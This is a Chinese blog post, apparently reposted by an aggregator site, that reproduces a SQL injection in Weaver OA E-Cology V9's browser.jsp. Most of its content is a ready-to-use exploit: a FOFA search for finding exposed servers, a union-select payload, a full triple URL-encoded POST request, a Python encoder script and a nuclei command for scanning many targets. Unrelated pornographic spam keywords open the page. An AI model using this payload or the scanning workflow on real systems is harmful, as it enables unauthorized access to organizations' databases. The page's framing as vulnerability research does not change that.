国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

漏洞復現(xiàn) 泛微OA E-Cology V9 browser.jsp SQL注入漏洞

這篇具有很好參考價值的文章主要介紹了漏洞復現(xiàn) 泛微OA E-Cology V9 browser.jsp SQL注入漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

漏洞復現(xiàn) 泛微OA E-Cology V9 browser.jsp SQL注入漏洞

漏洞描述

泛微新一代移動辦公平臺e-cology不僅組織提供了一體化的協(xié)同工作平臺,將組織事務逐漸實現(xiàn)全程電子化,改變傳統(tǒng)紙質文件、實體簽章的方式。泛微OA E-Cology 平臺browser.jsp處存在SQL注入漏洞,攻擊者通過漏洞可以獲取服務器數(shù)據(jù)庫權限。
泛微漏洞,# 漏洞復現(xiàn),java,sql,開發(fā)語言

漏洞復現(xiàn)

fofa:app="泛微-協(xié)同商務系統(tǒng)"

1.使用POC查看當前數(shù)據(jù)庫版本,返回結果


1.MSSQL命令:
a' union select 1,''+(SELECT @@VERSION)+'

2.POC
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 649
DNT: 1
Connection: close
Cookie: ecology_JSessionid=aaaDJa14QSGzJhpHl4Vsy; JSESSIONID=aaaDJa14QSGzJhpHl4Vsy; __randcode__=28dec942-50d2-486e-8661-3e613f71028a
Upgrade-Insecure-Requests: 1

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

泛微漏洞,# 漏洞復現(xiàn),java,sql,開發(fā)語言
2.編寫并使用三次url全字符加密編碼的小腳本,如下


1命令:
python Fanwei_e-cology9_decode_three.py

2.腳本
import os
def main():
    clearFlag = "y"
    while(1):
        if clearFlag == "y" or clearFlag == "Y":
            os.system("cls")
        clearFlag = ""
        string = input("請輸入需要轉換的字符串 :")
        type = input("(輸入1:進行三次url全字符編碼 ) :")
        while(type != "1"):
            type = input("操作類型輸入錯誤(輸入1:進行三次url全字符編碼) :")
        if type == "1" :
            for i in range(3):
                string = encode(string)
            encode_string = string
            print("編碼結果為:"+encode_string+"\n")

#編碼
def encode(string):
    encode_string = ""
    for char in string:
        encode_char = hex(ord(char)).replace("0x","%")
        encode_string += encode_char
    return encode_string
main()

泛微漏洞,# 漏洞復現(xiàn),java,sql,開發(fā)語言
2.nuclei驗證

nuclei.exe -t FanWeiOA_E-Cology9_browser_SQL.yaml -l subs.txt -stats

泛微漏洞,# 漏洞復現(xiàn),java,sql,開發(fā)語言文章來源地址http://www.zghlxwxcb.cn/news/detail-530007.html

到了這里,關于漏洞復現(xiàn) 泛微OA E-Cology V9 browser.jsp SQL注入漏洞的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯(lián)網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 【高?!糠何?e-cology <10.57 存在 SQL注入漏洞(POC)(MPS-ndqt-0im5)

    【高?!糠何?e-cology <10.57 存在 SQL注入漏洞(POC)(MPS-ndqt-0im5)

    泛微協(xié)同管理應用平臺(e-cology)是一套企業(yè)大型協(xié)同管理平臺。 泛微 e-cology 受影響版本存在SQL注入漏洞,未經授權的遠程攻擊者可通過發(fā)送特殊的HTTP請求來獲取數(shù)據(jù)庫的敏感信息。 漏洞名稱 GeoServer 存在 sql 注入漏洞 漏洞類型 SQL注入 發(fā)現(xiàn)時間 2023/4/22 漏洞影響廣度 廣 MPS編號

    2024年02月13日
    瀏覽(95)
  • CNVD-2023-12632 泛微e-cology9 sql注入 附poc

    CNVD-2023-12632 泛微e-cology9 sql注入 附poc

    眾亦信安,中意你??! 微信搜索:眾亦信安,回復:230317 領批量檢測腳本。 聲明:文中涉及到的技術和工具,僅供學習使用,禁止從事任何非法活動,如因此造成的直接或間接損失,均由使用者自行承擔責任。 泛微 E-Cology9 協(xié)同辦公系統(tǒng)是一套基于 JSP 及 SQL Server 數(shù)

    2024年02月11日
    瀏覽(22)
  • 金山終端安全系統(tǒng)V9.0 SQL注入漏洞復現(xiàn)

    金山終端安全系統(tǒng)V9.0 SQL注入漏洞復現(xiàn)

    ? ? ?金山終端安全系統(tǒng)是一款為企業(yè)提供終端防護的安全產品,針對惡意軟件、病毒和外部攻擊提供防范措施,幫助維護企業(yè)數(shù)據(jù)和網絡。 ? ? 金山終端安全系統(tǒng)V9.0?/inter/update_software_info_v2.php頁面存在sql注入漏洞,該漏洞是由于金山終端安全系統(tǒng)未對用戶的輸入進行有效的

    2024年02月08日
    瀏覽(32)
  • 紅帆OA SQL注入漏洞復現(xiàn)

    紅帆OA SQL注入漏洞復現(xiàn)

    ? ? 紅帆iOffice.net從最早滿足醫(yī)院行政辦公需求(傳統(tǒng)OA),到目前融合了衛(wèi)生主管部門的管理規(guī)范和眾多行業(yè)特色應用,是目前唯一定位于解決醫(yī)院綜合業(yè)務管理的軟件,是最符合醫(yī)院行業(yè)特點的醫(yī)院綜合業(yè)務管理平臺,是成功案例最多的醫(yī)院綜合業(yè)務管理軟件。 ??紅帆

    2024年02月12日
    瀏覽(26)
  • 漏洞復現(xiàn)-金和OA GetAttOut接口SQL注入漏洞(附漏洞檢測腳本)

    漏洞復現(xiàn)-金和OA GetAttOut接口SQL注入漏洞(附漏洞檢測腳本)

    文章中涉及的漏洞均已修復,敏感信息均已做打碼處理,文章僅做經驗分享用途,切勿當真,未授權的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔

    2024年01月16日
    瀏覽(92)
  • 金山終端安全系統(tǒng)V9.0 update_software_info_v2.php處SQL注入漏洞復現(xiàn) [附POC]

    免責聲明:請勿利用文章內的相關

    2024年02月03日
    瀏覽(18)
  • 【漏洞復現(xiàn)】泛微e-office OfficeServer2.php 存在任意文件讀取漏洞復現(xiàn)

    泛微e-office OfficeServer2.php 存在任意文件讀取漏洞,攻擊者可通過構造特定Payload獲取敏感數(shù)據(jù)信息。 請勿利用文章內的相關技術從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負責,所產生的一切不良后果

    2024年02月09日
    瀏覽(22)
  • 泛微e-Bridge未授權文件讀取漏洞復現(xiàn)

    泛微e-Bridge未授權文件讀取漏洞復現(xiàn)

    泛微云橋 e-Bridge 存在未經授權讀取任意文件漏洞,可利用該漏洞,實現(xiàn)任意文件讀取,獲取敏感信息。 fofa title=\\\"泛微云橋e-Bridge\\\" 因為不是在本地搭建的漏洞復現(xiàn)環(huán)境,利用空間搜索引擎只找到很少量存在漏洞的網站,大多數(shù)都開啟了身份驗證,找到的也都是基于Windows的,所

    2024年02月09日
    瀏覽(20)
  • 【漏洞復現(xiàn)-通達OA】通達OA share身份認證繞過漏洞

    【漏洞復現(xiàn)-通達OA】通達OA share身份認證繞過漏洞

    通達OA(Office Anywhere網絡智能辦公系統(tǒng))是中國通達公司的一套協(xié)同辦公自動化軟件。通達OA /share/handle.php存在一個認證繞過漏洞,利用該漏洞可以實現(xiàn)任意用戶登錄。攻擊者可以通過構造惡意攻擊代碼,成功登錄系統(tǒng)管理員賬戶,繼而在系統(tǒng)后臺上傳惡意文件控制網站服務器

    2024年02月19日
    瀏覽(70)
  • 致遠OA wpsAssistServlet 任意文件上傳漏洞 漏洞復現(xiàn)

    致遠OA wpsAssistServlet 任意文件上傳漏洞 漏洞復現(xiàn)

    致遠OA是一套辦公協(xié)同管理軟件。致遠OA wpsAssistServlet接口存在任意文件上傳漏洞,攻擊者通過漏洞可以發(fā)送特定的請求包上傳惡意文件,獲取服務器權限。 致遠OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致遠OA G6、G6N (V8.1、V8.1SP1) 1、調用文件上傳接口上傳測試文件,請求包如下: 2、

    2024年02月11日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包